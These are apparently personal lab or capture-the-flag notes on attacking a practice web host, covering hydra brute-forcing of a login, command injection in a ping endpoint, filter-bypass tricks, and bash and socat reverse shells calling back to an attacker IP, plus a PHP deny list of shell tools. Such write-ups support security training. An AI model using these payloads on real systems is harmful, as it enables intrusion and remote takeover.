### `www.monitoring.inlanefreight.local`
- test login ![[images/Pasted image 20260630085152.png]]
## `monitoring.inlanefreight.local`
- another login ![[images/Pasted image 20260628153132.png]]
- `admin:admin` doesnt work ![[images/Pasted image 20260630195041.png]]
### SQLi
- try SQLi
```bash
sqlmap --batch -r monitoring.inlanefreight.local.req
```
![[images/Pasted image 20260630200257.png]]
### brute force
- we know that invalid creds show: "Invalid Cedentials!"
- `request:response` in burp ![[images/Pasted image 20260630200657.png]]
- view source ![[images/Pasted image 20260630200446.png]]
- use `hydra`
```bash
hydra -l admin -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt monitoring.inlanefreight.local -f http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid Credentials!"
```
- no hits with `rockyou-50.txt` ![[images/Pasted image 20260630202132.png]]
- no hits with `/usr/share/seclists/Passwords/Leaked-Databases/rockyou-70.txt` ![[images/Pasted image 20260630203620.png]]
- change payload and try some different wordlists
- `/usr/share/seclists/Passwords/2023-200_most_used_passwords.txt`
- `/usr/share/seclists/Passwords/Common-Credentials/xato-net-10-million-passwords-100000.txt`
```bash
hydra -l admin -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt monitoring.inlanefreight.local -f http-post-form "/login.php:username=^USER^&password=^PASS^:F=Invalid Credentials"
```
- we have a hit ![[images/Pasted image 20260630203745.png]]
## restricted shell as `inlanefreight/admin`
- logging in with above creds drops me into a GUI-based restricted shell ![[images/Pasted image 20260630204050.png]]
- we have access to a few `.txt` files
- `help` show what commands we have access to ![[images/Pasted image 20260630204149.png]]
- after looking at `main.js` this is not a real CLI just a pseduo LCI in javascript
- with some help from gemini we find that the `connection_test` command is executing a `ping` on the backend ![[images/Pasted image 20260630205640.png]]
- try to recreate this in browser![[images/Pasted image 20260630210016.png]]
- `request:response` in burp ![[images/Pasted image 20260630210237.png]]
- unable to change to a POST
- garbage input works even without a real ip address ![[images/Pasted image 20260630211426.png]]
- `127.0.0.1;` is filtered but `127.0.0.1${LS_COLORS:10:1}` is not
- URL encoded new line character works > `%2a`
- can run `ls` but not `id` or `pwd`
```bash
ip=127.0.0.1%0Als
```
![[images/Pasted image 20260630213029.png]]
- try to `cat` file
```bash
ip=127.0.0.1%0Acat${IFS}00112233_flag.txt
```
## revshell
- read `ping.php` and copy+paste into a file
```bash
ip=127.0.0.1%0Acat${IFS}ping.php
```
- contents of `ping.php`
```php
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
$output = '';
function filter($str)
{
$operators = ['&', '|', ';', '\\', '/', ' '];
foreach ($operators as $operator) {
if (strpos($str, $operator)) {
return true;
}
}
$words = ['whoami', 'echo', 'rm', 'mv', 'cp', 'id', 'curl', 'wget', 'cd', 'sudo', 'mkdir', 'man', 'history', 'ln', 'grep', 'pwd', 'file', 'find', 'kill', 'ps', 'uname', 'hostname', 'date', 'uptime', 'lsof', 'ifconfig', 'ipconfig', 'ip', 'tail', 'netstat', 'tar', 'apt', 'ssh', 'scp', 'less', 'more', 'awk', 'head', 'sed', 'nc', 'netcat'];
foreach ($words as $word) {
if (strpos($str, $word) !== false) {
return true;
}
}
return false;
}
if (isset($_GET['ip'])) {
$ip = $_GET['ip'];
if (filter($ip)) {
$output = "Invalid input";
} else {
$cmd = "bash -c 'ping -c 1 " . $ip . "'";
$output = shell_exec($cmd);
}
}
?>
<?php
echo $output;
?>
```
- `ping.php` filters out common operators and commands
- below revshell will be tough based on filtering of & and /
```bash
/bin/bash -i >& /dev/tcp/10.10.15.114/9001 0>&1
```
- base64 the above command then use below
```bash
ip=127.0.0.1%0Aexport${IFS}CMD="L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE1LjExNC85MDAxIDA+JjE="$(tr${IFS}'!-}'${IFS}'"-~'<<<:)bash<<<$(base64${IFS}-d<<<$CMD)
```
- issues here ![[images/Pasted image 20260630221929.png]]
- check for `socat` on the target ![[images/Pasted image 20260630221910.png]]
- create payload
```bash
ip=127.0.0.1%0Asocat${IFS}TCP:10.10.15.114:9001${IFS}EXEC:${LS_COLORS:10:1}bin${LS_COLORS:10:1}bash
```
- getting a connection that immediately closes ![[images/Pasted image 20260630222353.png]]
- modify payload
```bash
ip=127.0.0.1%0Asocat${IFS}TCP:10.10.15.114:9001${IFS}EXEC:bash
```
- we have a hit ![[images/Pasted image 20260630222557.png]]
- we can read logs in `/var/log` because we are in the `adm` group